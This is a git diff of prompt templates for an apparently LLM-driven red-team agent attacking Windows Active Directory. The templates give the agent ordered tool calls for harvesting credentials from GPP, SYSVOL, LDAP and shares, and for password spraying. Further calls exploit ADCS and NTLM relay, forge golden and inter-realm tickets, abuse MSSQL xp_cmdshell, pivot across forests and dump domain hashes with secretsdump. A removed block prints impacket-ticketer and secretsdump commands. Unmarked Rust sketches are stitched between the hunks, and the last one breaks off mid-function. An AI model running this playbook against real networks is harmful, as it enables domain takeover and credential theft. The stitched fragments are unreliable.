gpp_password_finder(target=DC_IP, username=USER, password=PASS, domain=DOMAIN) -2. sysvol_script_search(target=DC_IP, username=USER, password=PASS, domain=DOMAIN) -3. ldap_search_descriptions(...) - check for passwords in LDAP descriptions -4. username_as_password(...) - check for user=password accounts +**EXECUTE IN THIS ORDER (worker injects credentials at dispatch):** +1. gpp_password_finder(target=DC_IP, username=USER, domain=DOMAIN) +2. sysvol_script_search(target=DC_IP, username=USER, domain=DOMAIN) +3. ldap_search_descriptions(target=DC_IP, username=USER, domain=DOMAIN) - check for passwords in LDAP descriptions +4. username_as_password(target=DC_IP, domain=DOMAIN) - check for user=password accounts These are HIGH SUCCESS RATE techniques that find hardcoded credentials. Report any credentials found immediately. diff --git a/ares-llm/templates/redteam/tasks/credaccess_share_spider.md.tera b/ares-llm/templates/redteam/tasks/credaccess_share_spider.md.tera index 69740d32..c9c9e5fb 100644 --- a/ares-llm/templates/redteam/tasks/credaccess_share_spider.md.tera +++ b/ares-llm/templates/redteam/tasks/credaccess_share_spider.md.tera @@ -3,12 +3,12 @@ Target: {{ target_ip }} Domain: {{ domain }} Username: {{ username }} -Password: {{ password }} +Auth: password (auto-resolved at dispatch — do NOT pass password/hash/ticket fields) Share hint: {{ share_hint }} Task ID: {{ task_id }} **INSTRUCTIONS:** -1. Use smbclient_spider(target='{{ target_ip }}', share='{{ share_param }}', username='{{ username }}', password='{{ password }}', domain='{{ domain }}') +1. Use smbclient_spider(target='{{ target_ip }}', share='{{ share_param }}', username='{{ username }}', domain='{{ domain }}') 2. Look for interesting files containing credentials: - *.txt files (passwords, connection strings) - *.xml, *.ini, *.config files (configuration with creds) diff --git a/ares-llm/templates/redteam/tasks/credaccess_spray.md.tera b/ares-llm/templates/redteam/tasks/credaccess_spray.md.tera index 5f23920c..ff5965cc 100644 --- a/ares-llm/templates/redteam/tasks/credaccess_spray.md.tera +++ b/ares-llm/templates/redteam/tasks/credaccess_spray.md.tera @@ -6,13 +6,16 @@ Task ID: {{ task_id }} {% if cred_line -%} {{ cred_line }} {% endif -%} -**EXECUTE username_as_password:** -1. First save users: save_users_to_file(target='{{ dc_ip }}', username='{{ username }}', password='{{ password }}', domain='{{ domain }}') -2. Then spray: username_as_password(target='{{ dc_ip }}', domain='{{ domain }}', users_file='/tmp/users.txt') +**EXECUTE username_as_password (worker injects credentials at dispatch):** +1. First save users: save_users_to_file(target='{{ dc_ip }}', username='{{ username }}', domain='{{ domain }}') +2. Then spray: username_as_password(target='{{ dc_ip }}', domain='{{ domain }}', users_file='/tmp/users.txt'{% if excluded_users %}, excluded_users='{{ excluded_users }}'{% endif %}) This tests if users have username=password (e.g., testuser:testuser). Zero lockout risk, one attempt per user. Report any credentials found immediately. 
+{% if excluded_users %} +**DO NOT auth as these locked-out users: {{ excluded_users }} — pass them via `excluded_users` so the worker drops them from the wordlist before netexec runs.** +{% endif %} {% if state_context %} ## Current Operation State diff --git a/ares-llm/templates/redteam/tasks/credaccess_with_creds.md.tera b/ares-llm/templates/redteam/tasks/credaccess_with_creds.md.tera index d391fc39..c14bbf26 100644 --- a/ares-llm/templates/redteam/tasks/credaccess_with_creds.md.tera +++ b/ares-llm/templates/redteam/tasks/credaccess_with_creds.md.tera @@ -4,7 +4,7 @@ Domain: {{ domain }} DC IP: {{ dc_ip_display }} Targets: {{ targets_display }} Username: {{ user_display }} -Credential: {{ cred_display }} +Auth: {{ cred_capability }} (auto-resolved at dispatch — do NOT pass password/hash/ticket fields) Task ID: {{ task_id }} **CRITICAL: YOU MUST EXECUTE THESE TECHNIQUES IN ORDER:** diff --git a/ares-llm/templates/redteam/tasks/exploit_adcs_enumerate.md.tera b/ares-llm/templates/redteam/tasks/exploit_adcs_enumerate.md.tera index bbd32275..a4dd9ef8 100644 --- a/ares-llm/templates/redteam/tasks/exploit_adcs_enumerate.md.tera +++ b/ares-llm/templates/redteam/tasks/exploit_adcs_enumerate.md.tera @@ -14,8 +14,8 @@ Task ID: {{ task_id }} - Max 2 attempts at certipy_find, then report failure **INSTRUCTIONS:** -1. Run certipy_find to enumerate ADCS vulnerabilities: - certipy_find(domain='{{ domain }}', username='{{ username }}', password='{{ password }}', dc_ip='{{ dc_ip }}') +1. Run certipy_find to enumerate ADCS vulnerabilities (worker injects credentials at dispatch): + certipy_find(domain='{{ domain }}', username='{{ username }}', dc_ip='{{ dc_ip }}') 2. Look for ESC1-ESC15 vulnerabilities in the output 3. Report any vulnerable templates found diff --git a/ares-llm/templates/redteam/tasks/exploit_adcs_esc.md.tera b/ares-llm/templates/redteam/tasks/exploit_adcs_esc.md.tera index edc46b3c..135aa8d2 100644 --- a/ares-llm/templates/redteam/tasks/exploit_adcs_esc.md.tera +++ b/ares-llm/templates/redteam/tasks/exploit_adcs_esc.md.tera @@ -1,22 +1,44 @@ **ADCS {{ vuln_upper }} EXPLOITATION** CA Server: {{ ca_server }} -Template: {{ template }} +{% if ca_name %}CA Name: {{ ca_name }} +{% endif %}Template: {{ template }} Domain: {{ domain }} -Task ID: {{ task_id }} +{% if dc_ip %}DC IP: {{ dc_ip }} +{% endif %}{% if username %}Username: {{ username }} +{% endif %}{% if password %}Password: {{ password }} +{% endif %}{% if admin_sid %}Admin SID: {{ admin_sid }} +{% endif %}Task ID: {{ task_id }} -**STEP BUDGET: ~25 steps max. Work efficiently!** +{% if instructions %}**INSTRUCTIONS:** +{{ instructions }} + +{% endif %}**STEP BUDGET: ~25 steps max. Work efficiently!** **HARD LIMITS:** - 'connection refused'/'timed out' -> CA unreachable, STOP immediately - 'web enrollment' error -> HTTP not available, call task_complete(failed) - Max 2 attempts per tool, then report failure +{% if not is_esc8 -%} +**CRITICAL PARAMETERS for certipy_request:** +- `ca` = CA Name ({{ ca_name }}) — the CA identifier +- `target` = CA Server IP ({{ ca_server }}) — RPC enrollment connects here +- `dc_ip` = DC IP ({{ dc_ip }}) — LDAP queries only +- Do NOT confuse `target` (CA server) with `dc_ip` (domain controller) +{% if admin_sid %}- `sid` = {{ admin_sid }} — prevents SID mismatch in certipy_auth +{% endif %} +{% endif -%} + **WORKFLOW:** {% if is_esc8 -%} -1. Start ntlmrelayx targeting the CA's web enrollment -2. Coerce DC/target to authenticate to relay -3. 
Relay captures cert -> certipy_auth for hash +{% if coerce_target %}Coerce Target (primary): {{ coerce_target }} (must differ from CA Server — Windows loopback blocks same-host relay) +{% endif %}{% if coerce_targets and coerce_targets | length > 1 %}Fallback Coerce Targets (try in order if primary's callback drifts): {{ coerce_targets | join(sep=", ") }} +{% endif %}{% if listener_ip %}Relay Listener: {{ listener_ip }} +{% endif %}1. Start ntlmrelayx targeting the CA's web enrollment{% if listener_ip %} bound to {{ listener_ip }}{% endif %} +2. Coerce {% if coerce_target %}{{ coerce_target }}{% else %}a DC or other target host (NOT the CA){% endif %} to authenticate to the relay +3. If the relay log shows no inbound auth (callback drift) and a credential is available, retry with `coerce_user` + `coerce_domain` set so DFSCoerce/Coercer phases can authenticate (worker injects `coerce_password`/`coerce_hash` from state){% if coerce_targets and coerce_targets | length > 1 %}; if still no callback, retry `relay_and_coerce` against the next host in the fallback list{% endif %} +4. Relay captures cert -> certipy_auth for hash {% else -%} 1. certipy_request to request certificate with alternate UPN 2. certipy_auth to get NTLM hash from certificate diff --git a/ares-llm/templates/redteam/tasks/exploit_delegation.md.tera b/ares-llm/templates/redteam/tasks/exploit_delegation.md.tera index 583b229c..1cd744ba 100644 --- a/ares-llm/templates/redteam/tasks/exploit_delegation.md.tera +++ b/ares-llm/templates/redteam/tasks/exploit_delegation.md.tera @@ -13,11 +13,11 @@ s4u_attack( target_spn='{{ target_spn }}', impersonate='Administrator', domain='{{ domain }}', - username='{{ username }}', - password='{{ password }}'{% if dc_ip %}, + username='{{ username }}'{% if dc_ip %}, dc_ip='{{ dc_ip }}'{% endif %} ) ``` +-> Worker injects the delegating account's credential at dispatch from operation state. -> Look for: 'Saving ticket in .ccache' **STEP 2: USE TICKET WITH SECRETSDUMP_KERBEROS (IMMEDIATELY AFTER!)** @@ -26,12 +26,11 @@ secretsdump_kerberos( target='{{ target_hostname }}', username='Administrator', domain='{{ domain }}', - ticket_path='', target_ip='{{ target_ip }}'{% if dc_ip %}, dc_ip='{{ dc_ip }}'{% endif %} ) ``` -**IMPORTANT:** Replace with actual .ccache path from s4u_attack output! +-> Worker selects the most recent ccache for `Administrator@{{ domain }}` from disk. **IMPORTANT:** Always use target_ip='{{ target_ip }}' to avoid DNS resolution issues! **STEP 3: ALTERNATIVE - PSEXEC_KERBEROS FOR SHELL** @@ -41,7 +40,6 @@ psexec_kerberos( target='{{ target_hostname }}', username='Administrator', domain='{{ domain }}', - ticket_path='', command='cmd /c whoami && hostname', target_ip='{{ target_ip }}'{% if dc_ip %}, dc_ip='{{ dc_ip }}'{% endif %} diff --git a/ares-llm/templates/redteam/tasks/exploit_golden_ticket.md.tera b/ares-llm/templates/redteam/tasks/exploit_golden_ticket.md.tera index 33610c3a..e3f57aff 100644 --- a/ares-llm/templates/redteam/tasks/exploit_golden_ticket.md.tera +++ b/ares-llm/templates/redteam/tasks/exploit_golden_ticket.md.tera @@ -2,22 +2,20 @@ Task ID: {{ task_id }} ## Golden Ticket Forging -Generate a golden ticket for **{{ domain }}** using the krbtgt hash. 
- -### Required Parameters (already obtained) -- **Domain**: `{{ domain }}` -- **Domain SID**: `{{ domain_sid }}` -- **krbtgt NTLM hash**: `{{ krbtgt_hash }}` -- **Username (RID 500)**: `{{ username }}` -{% if aes_key %}- **AES-256 key**: `{{ aes_key }}` -{% endif -%} -{% if dc_ip %}- **DC IP**: `{{ dc_ip }}` -{% endif -%} +Generate a golden ticket for **{{ domain }}** as **{{ username }}**. ### Instructions -1. Call `generate_golden_ticket` with `krbtgt_hash`, `domain_sid`, `domain`, and `username` set to `{{ username }}`. -2. The ticket will be written to `{{ username }}.ccache`. -3. Report success with the domain and ticket path. +Call `generate_golden_ticket` with **only** these arguments: + +- `domain`: `{{ domain }}` +- `username`: `{{ username }}` +{% if dc_ip %}- `dc_ip`: `{{ dc_ip }}` (optional, for SID resolution if needed) +{% endif -%} + +The dispatcher injects `krbtgt_hash`, `domain_sid`, and `aes_key` automatically +from operation state — do **NOT** pass these yourself, and do **NOT** call +`get_sid` (the SID is already in state). The tool will write the ticket to +`{{ username }}.ccache` and return the path. -**All parameters are provided above — call the tool directly. Do NOT call `get_sid`.** +Report success with the domain and ticket path. diff --git a/ares-llm/templates/redteam/tasks/exploit_mssql.md.tera b/ares-llm/templates/redteam/tasks/exploit_mssql.md.tera index 0c6bf068..8fb8764a 100644 --- a/ares-llm/templates/redteam/tasks/exploit_mssql.md.tera +++ b/ares-llm/templates/redteam/tasks/exploit_mssql.md.tera @@ -1,11 +1,30 @@ {{ base_prompt }}**MSSQL EXPLOITATION WORKFLOW (IMPERSONATION FIRST!):** +**STEP 0: MATCH CREDENTIAL FOREST TO CONNECT TARGET (cross-forest pivots)** +Before issuing any tool call, pick a `target` MSSQL host whose forest matches +the credential you intend to authenticate with. Direct Windows auth across a +forest trust **will fail** (no SID-history / no resolvable referral for SQL +logins) — even if the target MSSQL host is the one you ultimately want code +execution on. + +If `{{ target }}` belongs to a different forest than every credential you +have, change strategy: + 1. Connect to a same-forest MSSQL host (any SQL Server you have creds for + in your credential's domain). + 2. Enumerate its linked servers (STEP 5) — look for one pointing at + `{{ target }}` or its forest. + 3. Pivot across the link via `mssql_openquery` / `mssql_exec_linked` with + `impersonate_user='sa'` (STEP 6). + +The linked server's stored `sp_addlinkedsrvlogin` mapping carries the +authentication across the trust; your local Windows credential never has +to resolve in the remote forest. 
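The STEP 0 rule reduces to a small predicate. A hedged Rust sketch, with illustrative types and a suffix-based heuristic standing in for real trust enumeration (none of this is ares-tools API):

```rust
/// Same-forest approximation: equal domains, or one is a child of the other
/// (child.contoso.local vs contoso.local). Cross-forest pairs like
/// contoso.local vs fabrikam.local fail this check.
fn same_forest(a: &str, b: &str) -> bool {
    let (a, b) = (a.to_ascii_lowercase(), b.to_ascii_lowercase());
    a == b || a.ends_with(&format!(".{b}")) || b.ends_with(&format!(".{a}"))
}

/// Pick the first MSSQL host we can authenticate to directly with a
/// credential from `cred_domain`; cross-forest hosts are reached later via
/// linked-server pivots instead of direct Windows auth.
fn pick_connect_target<'a>(cred_domain: &str, hosts: &[(&'a str, &str)]) -> Option<&'a str> {
    hosts
        .iter()
        .find(|&&(_, host_domain)| same_forest(cred_domain, host_domain))
        .map(|&(host, _)| host)
}

fn main() {
    let hosts = [
        ("sql02.fabrikam.local", "fabrikam.local"),
        ("sql01.contoso.local", "contoso.local"),
    ];
    // A contoso credential skips the fabrikam host and connects same-forest.
    assert_eq!(
        pick_connect_target("contoso.local", &hosts),
        Some("sql01.contoso.local")
    );
}
```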
+ **STEP 1: ENUMERATE IMPERSONATION RIGHTS (DO THIS FIRST!)** ``` mssql_enum_impersonation( target='{{ target }}', - username=, - password=, + username='', domain= ) ``` @@ -15,8 +34,7 @@ mssql_enum_impersonation( ``` mssql_impersonate( target='{{ target }}', - username=, - password=, + username='', impersonate_user='sa', query='SELECT SYSTEM_USER', domain= @@ -28,8 +46,7 @@ mssql_impersonate( ``` mssql_enable_xp_cmdshell( target='{{ target }}', - username=, - password=, + username='', impersonate_user='sa', domain= ) @@ -39,8 +56,7 @@ mssql_enable_xp_cmdshell( ``` mssql_impersonate( target='{{ target }}', - username=, - password=, + username='', impersonate_user='sa', query='EXEC xp_cmdshell ''whoami /priv''', domain= @@ -52,12 +68,47 @@ mssql_impersonate( ``` mssql_enum_linked_servers( target='{{ target }}', - username=, - password=, + username='', domain= ) ``` -> Linked servers can pivot across domain/forest trusts! + +**STEP 6: PIVOT CROSS-FOREST (mssql_exec_linked DOUBLE-HOP CAVEAT)** +`mssql_exec_linked` runs `EXEC ('...') AT [link]` which uses the connecting +user's mapped credential — this **fails on cross-forest links** without +Kerberos delegation (the classic double-hop problem). Two source-side +workarounds, in order of preference: + +1. **OPENQUERY via stored login mapping** (`mssql_openquery`) — rides the + linked server's `sp_addlinkedsrvlogin` mapping and bypasses double-hop. + First check the link has `RPC OUT` and a stored credential: + ``` + mssql_command(target='{{ target }}', ..., + command="SELECT s.name, s.is_rpc_out_enabled, l.uses_self_credential, l.remote_name + FROM sys.servers s LEFT JOIN sys.linked_logins l ON s.server_id = l.server_id;") + ``` + Then pivot: + ``` + mssql_openquery(target='{{ target }}', ..., + linked_server='SQL02', + query='SELECT SYSTEM_USER, IS_SRVROLEMEMBER(''sysadmin'')') + ``` + +2. **EXECUTE AS LOGIN locally, then hop** — when current login has + IMPERSONATE on a high-priv login (e.g. `sa`), wrap the hop: + ``` + mssql_exec_linked(target='{{ target }}', ..., + linked_server='SQL02', + impersonate_user='sa', + query='SELECT SYSTEM_USER') + ``` + Same `impersonate_user` parameter works on `mssql_linked_enable_xpcmdshell` + and `mssql_linked_xpcmdshell`. + +If the linked server reports `is_rpc_out_enabled=1` and a non-self stored +login mapping exists, use `mssql_openquery`. Otherwise, enumerate +IMPERSONATE first and chain via `impersonate_user='sa'`. 
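The STEP 6 preference order is a decision over the enumerated link columns. Sketched in Rust under assumed types (`LinkedServerRow` mirrors the query's columns; neither type exists in ares-tools):

```rust
/// One row from the link-enumeration query above.
struct LinkedServerRow {
    is_rpc_out_enabled: bool,
    /// sys.linked_logins.uses_self_credential: true means the hop re-uses the
    /// caller's own credential, which re-introduces the double-hop problem.
    uses_self_credential: bool,
    /// Stored sp_addlinkedsrvlogin mapping, e.g. Some("sa".to_string()).
    remote_name: Option<String>,
}

#[derive(Debug, PartialEq)]
enum PivotPlan {
    /// mssql_openquery rides the stored login mapping (bypasses double-hop).
    OpenQuery,
    /// EXECUTE AS LOGIN 'sa' locally, then hop with impersonate_user='sa'.
    ImpersonateThenHop,
}

fn choose_pivot(row: &LinkedServerRow, can_impersonate_sa: bool) -> Option<PivotPlan> {
    // Stored non-self mapping + RPC OUT: OPENQUERY is the reliable path.
    if row.is_rpc_out_enabled && !row.uses_self_credential && row.remote_name.is_some() {
        return Some(PivotPlan::OpenQuery);
    }
    // Otherwise the hop only works from a high-privilege local context.
    can_impersonate_sa.then_some(PivotPlan::ImpersonateThenHop)
}

fn main() {
    let row = LinkedServerRow {
        is_rpc_out_enabled: true,
        uses_self_credential: false,
        remote_name: Some("sa".to_string()),
    };
    assert_eq!(choose_pivot(&row, false), Some(PivotPlan::OpenQuery));
}
```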
{% if creds_section %} {{ creds_section }} {% endif -%} @@ -65,7 +116,8 @@ mssql_enum_linked_servers( - Try EACH credential above - SQL accepts Windows auth - Impersonation check is HIGHEST PRIORITY (fastest path to sysadmin) - If xp_cmdshell gives NETWORK SERVICE, you may need potato attack for SYSTEM -- Linked servers enable cross-domain pivoting +- Linked servers enable cross-domain pivoting — cross-forest links REQUIRE + `mssql_openquery` or `impersonate_user='sa'` (see STEP 6) Report credentials obtained in JSON format: ```json diff --git a/ares-llm/templates/redteam/tasks/exploit_mssql_lateral.md.tera b/ares-llm/templates/redteam/tasks/exploit_mssql_lateral.md.tera index 6ceed223..75513645 100644 --- a/ares-llm/templates/redteam/tasks/exploit_mssql_lateral.md.tera +++ b/ares-llm/templates/redteam/tasks/exploit_mssql_lateral.md.tera @@ -8,8 +8,7 @@ Try each available credential against the MSSQL instance: ``` mssql_command( target='{{ target }}', - username=, - password=, + username='', command='SELECT SYSTEM_USER; SELECT IS_SRVROLEMEMBER(''sysadmin'')', domain='{{ domain }}' ) @@ -20,8 +19,7 @@ mssql_command( ``` mssql_enum_impersonation( target='{{ target }}', - username=, - password=, + username='', domain='{{ domain }}' ) ``` @@ -31,8 +29,7 @@ mssql_enum_impersonation( ``` mssql_enum_linked_servers( target='{{ target }}', - username=, - password=, + username='', domain='{{ domain }}' ) ``` @@ -41,8 +38,7 @@ mssql_enum_linked_servers( ``` mssql_exec_linked( target='{{ target }}', - username=, - password=, + username='', linked_server='', query='SELECT SYSTEM_USER; SELECT IS_SRVROLEMEMBER(''sysadmin'')', domain='{{ domain }}' @@ -54,8 +50,7 @@ If 'sa' is impersonatable, IMMEDIATELY exploit it: ``` mssql_impersonate( target='{{ target }}', - username=, - password=, + username='', impersonate_user='sa', query='SELECT SYSTEM_USER', domain='{{ domain }}' @@ -65,8 +60,7 @@ Then enable xp_cmdshell WITH impersonation (CRITICAL - must pass impersonate_use ``` mssql_enable_xp_cmdshell( target='{{ target }}', - username=, - password=, + username='', impersonate_user='sa', domain='{{ domain }}' ) @@ -75,8 +69,7 @@ Then run commands VIA mssql_impersonate (xp_cmdshell requires sa context!): ``` mssql_impersonate( target='{{ target }}', - username=, - password=, + username='', impersonate_user='sa', query='EXEC xp_cmdshell ''whoami /priv''', domain='{{ domain }}' @@ -89,8 +82,7 @@ If you have sysadmin but need domain creds: ``` mssql_ntlm_coerce( target='{{ target }}', - username=, - password=, + username='', listener='', domain='{{ domain }}' ) diff --git a/ares-llm/templates/redteam/tasks/exploit_trust.md.tera b/ares-llm/templates/redteam/tasks/exploit_trust.md.tera index c28c8402..4459c985 100644 --- a/ares-llm/templates/redteam/tasks/exploit_trust.md.tera +++ b/ares-llm/templates/redteam/tasks/exploit_trust.md.tera @@ -3,25 +3,117 @@ Source Domain: {{ domain }} Target Domain: {{ trusted_domain }} DC IP: {{ dc_ip }} +Auth: {{ source_auth }} (auto-resolved at dispatch — do NOT pass password/hash/ticket fields) Task ID: {{ task_id }} +{% if is_child_to_parent and has_child_krbtgt -%} +**INTRA-FOREST CHILD→PARENT — ExtraSid via child krbtgt** + +This is a parent-child intra-forest trust. SID filtering does NOT apply, so we +forge a golden ticket signed by the child krbtgt with the parent's Enterprise +Admins SID via `extra_sid`. 
**Do NOT call extract_trust_key, get_sid, or +create_inter_realm_ticket — those are not needed for this path.** + +The child krbtgt hash is already stored in operation state and the worker will +inject it at dispatch — call `generate_golden_ticket` with the principal-only +fields below. + +**STEP 1: FORGE EXTRASID GOLDEN TICKET** +``` +generate_golden_ticket( + domain='{{ domain }}', + target_user='Administrator', + extra_sid='{{ extra_sid_val }}-519' +) +``` +-> Saves `Administrator.ccache` in working directory +-> Worker injects `krbtgt_hash` and `domain_sid` from state automatically. + +**STEP 2: DCSync THE PARENT DC WITH THE TICKET** +``` +secretsdump_kerberos( + target='{{ target_dc_hostname | default(value="") }}', + username='Administrator', + domain='{{ trusted_domain }}', + dc_ip='{{ target_dc_hint }}', + target_ip='{{ target_dc_hint }}' +) +``` +-> Worker resolves the inter-realm/forged ccache from state automatically. +-> Success means parent krbtgt hash extracted = full DA on parent. + +**Fallback A — `-just-dc-user krbtgt` if SPN target name validation blocks DRSUAPI:** +``` +secretsdump_kerberos( + target='{{ target_dc_hostname | default(value="") }}', + username='Administrator', + domain='{{ trusted_domain }}', + dc_ip='{{ target_dc_hint }}', + target_ip='{{ target_dc_hint }}', + just_dc_user='krbtgt' +) +``` + +**Fallback B — VSS shadow-copy if DRSUAPI is fully hardened:** +``` +secretsdump_kerberos( + target='{{ target_dc_hostname | default(value="") }}', + username='Administrator', + domain='{{ trusted_domain }}', + dc_ip='{{ target_dc_hint }}', + target_ip='{{ target_dc_hint }}', + use_vss=true +) +``` + +**Fallback C — direct PTH secretsdump using the parent Administrator hash if it +has been harvested in a previous step.** The hash is stored in operation state; +the worker injects it at dispatch — do NOT include a `hash=` field yourself: +``` +secretsdump( + target='{{ target_dc_hint }}', + username='Administrator', + domain='{{ trusted_domain }}' +) +``` + +Report the parent krbtgt hash as a finding once obtained: +```json +{"hash": {"username": "krbtgt", "hash_value": "...", "hash_type": "NTLM", "domain": "{{ trusted_domain }}"}} +``` + +{% if state_context %} + +## Current Operation State + +{{ state_context }} +{% endif -%} +{% else -%} {% if has_trust_key -%} -**TRUST KEY (already extracted):** `{{ trust_key }}` +**TRUST KEY:** already extracted and stored in operation state — the worker +injects it at dispatch when you call `create_inter_realm_ticket`. {% else -%} +{% if has_source_da -%} **STEP {{ step_extract }}: EXTRACT INTER-REALM TRUST KEY** ``` extract_trust_key( domain='{{ domain }}', username='{{ username }}', - password='{{ password }}', dc_ip='{{ dc_ip }}', trusted_domain='{{ trusted_domain }}' ) ``` +-> Worker injects the source DA password/hash from state. -> Look for: trust account NTLM hash (e.g., {{ trusted_domain_prefix }}$ hash) -> Also extract AES256 key if available (needed for Windows 2016+) +{% else -%} +**STEP {{ step_extract }}: EXTRACT INTER-REALM TRUST KEY — credentials missing** +No DA-level credential or hash for `{{ domain }}` is available in operation +state. Source one first via DCSync, then retry trust key extraction. 
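A sketch of the dispatcher-side guard this branch implies, assuming a simplified credential store (the types are illustrative, not the ares-rust state model):

```rust
#[derive(Clone)]
#[allow(dead_code)]
enum Secret {
    Password(String),
    NtlmHash(String),
}

struct StoredCred {
    domain: String,
    is_domain_admin: bool,
    secret: Secret,
}

/// Only dispatch extract_trust_key when state holds a DA-level secret for
/// the source domain; otherwise emit the "source one via DCSync" task first.
fn da_secret_for<'a>(state: &'a [StoredCred], domain: &str) -> Option<&'a Secret> {
    state
        .iter()
        .find(|c| c.is_domain_admin && c.domain.eq_ignore_ascii_case(domain))
        .map(|c| &c.secret)
}

fn main() {
    let state = vec![StoredCred {
        domain: "contoso.local".into(),
        is_domain_admin: true,
        secret: Secret::NtlmHash("b8d76e56e9dac90539aff05e3ccb1755".into()),
    }];
    assert!(da_secret_for(&state, "CONTOSO.LOCAL").is_some());
    assert!(da_secret_for(&state, "fabrikam.local").is_none());
}
```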
+ +{% endif -%} {% endif -%} {% if needs_source_sid or needs_target_sid -%} **STEP {{ step_sid }}: RESOLVE DOMAIN SIDs** @@ -31,18 +123,17 @@ Source SID (resolve via source DC): get_sid( domain='{{ domain }}', username='{{ username }}', - password='{{ password }}', dc_ip='{{ dc_ip }}' ) ``` {% endif -%} {% if needs_target_sid -%} -Target SID (resolve via target DC using trust key for auth): +Target SID (resolve via target DC using trust key for auth — worker injects the +trust key at dispatch): ``` get_sid( domain='{{ trusted_domain }}', username='{{ username }}', - hash='{{ trust_key_or_placeholder }}', dc_ip='{{ target_dc_hint }}' ) ``` @@ -53,26 +144,29 @@ get_sid( ``` create_inter_realm_ticket( source_domain='{{ domain }}', - source_sid='{{ source_sid_val }}', - trust_key='{{ trust_key_val }}', target_domain='{{ trusted_domain }}', - target_sid='{{ target_sid_val }}', username='Administrator'{% if is_child_to_parent %}, extra_sid='{{ extra_sid_val }}-519'{% endif %} ) ``` --> Saves .ccache ticket file for cross-domain auth +-> Worker injects `source_sid`, `target_sid`, and `trust_key` from state. +-> Saves ticket to `Administrator.ccache` in working directory. **STEP {{ step_secretsdump }}: USE TICKET FOR SECRETSDUMP ON TARGET DOMAIN** +{% if target_dc_hostname -%} +Target DC hostname: `{{ target_dc_hostname }}` +Target DC IP: `{{ target_dc_hint }}` +{% endif -%} ``` secretsdump_kerberos( - target='', + target='{{ target_dc_hostname | default(value="") }}', username='Administrator', domain='{{ trusted_domain }}', - ticket_path='', - target_ip='' + dc_ip='{{ target_dc_hint }}', + target_ip='{{ target_dc_hint }}' ) ``` +-> Worker resolves the inter-realm ccache from state automatically. -> Look for krbtgt hash = DOMAIN ADMIN on target domain! -> Look for Administrator hash = full access to target domain @@ -83,49 +177,43 @@ The standard `create_inter_realm_ticket()` + `secretsdump_kerberos()` flow may f cross-forest trusts due to an impacket bug (fortra/impacket#315): `getST`/`getKerberosTGS` sends the referral TGT to the wrong KDC. -**If the standard flow fails, use the reliable forge-and-present workaround:** -1. Forge an inter-realm TGT with the trust key using `ticketer`: - ``` - impacket-ticketer -nthash \ - -domain {{ domain }} -domain-sid \ - -spn krbtgt/{{ trusted_domain }} \ - -target-domain {{ trusted_domain }} Administrator - ``` -2. Export the ticket: `export KRB5CCNAME=Administrator.ccache` -3. Run secretsdump directly against the TARGET DC (bypasses referral): - ``` - impacket-secretsdump -k -no-pass -target-ip -just-dc - ``` - -This forges the inter-realm TGT locally and presents it directly to the target DC, -avoiding the broken cross-realm referral logic entirely. +**If the standard flow fails, use the reliable forge-and-present workaround.** +The trust key, source SID, and target SID are stored in operation state — the +worker injects them at dispatch. 
Call: +``` +create_inter_realm_ticket( + source_domain='{{ domain }}', + target_domain='{{ trusted_domain }}', + username='Administrator' +) +``` +Then run secretsdump directly against the TARGET DC (bypasses referral): +``` +secretsdump_kerberos( + target='{{ target_dc_hostname | default(value="") }}', + username='Administrator', + domain='{{ trusted_domain }}', + dc_ip='{{ target_dc_hint }}', + target_ip='{{ target_dc_hint }}', + just_dc=true +) +``` {% endif -%} {% if is_child_to_parent -%} **ALTERNATIVE (STEP {{ step_raise_child }}): AUTOMATIC CHILD-TO-PARENT ESCALATION** If manual steps above fail, use the automated approach: ``` -{% if password -%} -raise_child( - child_domain='{{ domain }}', - username='{{ username }}', - password='{{ password }}' -) -{% elif admin_hash -%} raise_child( child_domain='{{ domain }}', username='{{ username }}', - hash='{{ admin_hash }}' -) -{% else -%} -raise_child( - child_domain='{{ domain }}', - username='{{ username }}', - password='' + dc_ip='{{ dc_ip }}', + target_ip='{{ target_dc_hint }}' ) -{% endif -%} ``` +-> Worker injects the source DA password/hash from state. -> Automates: trust key extraction + ExtraSid golden ticket + parent DC secretsdump +-> `dc_ip`/`target_ip` are mandatory when DNS cannot resolve child/parent FQDNs from the operator host. {% endif -%} **CRITICAL NOTES:** @@ -146,3 +234,4 @@ Report any hashes obtained: {{ state_context }} {% endif -%} +{% endif -%} diff --git a/ares-llm/templates/redteam/tasks/lateral.md.tera b/ares-llm/templates/redteam/tasks/lateral.md.tera index 728716c4..ea18f47d 100644 --- a/ares-llm/templates/redteam/tasks/lateral.md.tera +++ b/ares-llm/templates/redteam/tasks/lateral.md.tera @@ -2,7 +2,7 @@ **Technique:** {{ technique }} **Target:** {{ target_ip }} -{% if credential_username %}**Credential:** {{ credential_username }}@{{ credential_domain }}{% if credential_password %} / Password: {{ credential_password }}{% endif %} +{% if credential_username %}**Principal:** {{ credential_username }}@{{ credential_domain }} (auth: {{ credential_auth_type }} — auto-resolved at dispatch, do NOT pass password/hash/ticket fields) {% endif -%} Move laterally to the target using {{ technique }}. diff --git a/ares-llm/templates/redteam/tasks/privesc_enumeration.md.tera b/ares-llm/templates/redteam/tasks/privesc_enumeration.md.tera index f2bd1633..0e980929 100644 --- a/ares-llm/templates/redteam/tasks/privesc_enumeration.md.tera +++ b/ares-llm/templates/redteam/tasks/privesc_enumeration.md.tera @@ -4,7 +4,7 @@ **Target:** {{ target_ip }} {% if domain %}**Domain:** {{ domain }} {% endif -%} -{% if credential_username %}**Credential:** {{ credential_username }}@{{ credential_domain }}{% if credential_password %} / Password: {{ credential_password }}{% endif %} +{% if credential_username %}**Principal:** {{ credential_username }}@{{ credential_domain }} (auth: {{ credential_auth_type }} — auto-resolved at dispatch, do NOT pass password/hash/ticket fields) {% endif -%} Enumerate privilege escalation opportunities using {{ technique }}. 
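The lateral and privesc templates above both lean on the same "auto-resolved at dispatch" contract. A minimal sketch of that injection step, with hypothetical names (`inject_credentials` and `AuthMaterial` are assumptions, not the actual worker API):

```rust
use serde_json::{json, Value};

/// Auth material held in operation state for the task's principal.
enum AuthMaterial {
    Password(String),
    NtlmHash(String),
    Ticket(String), // ccache path
}

/// Merge the stored secret into the tool args just before execution, so
/// prompts never carry passwords, hashes, or ticket paths.
fn inject_credentials(mut args: Value, auth: &AuthMaterial) -> Value {
    let obj = args.as_object_mut().expect("tool args are a JSON object");
    // Strip any secret fields the model passed anyway; state is authoritative.
    for k in ["password", "hash", "ticket_path"] {
        obj.remove(k);
    }
    match auth {
        AuthMaterial::Password(p) => obj.insert("password".into(), json!(p)),
        AuthMaterial::NtlmHash(h) => obj.insert("hash".into(), json!(h)),
        AuthMaterial::Ticket(t) => obj.insert("ticket_path".into(), json!(t)),
    };
    args
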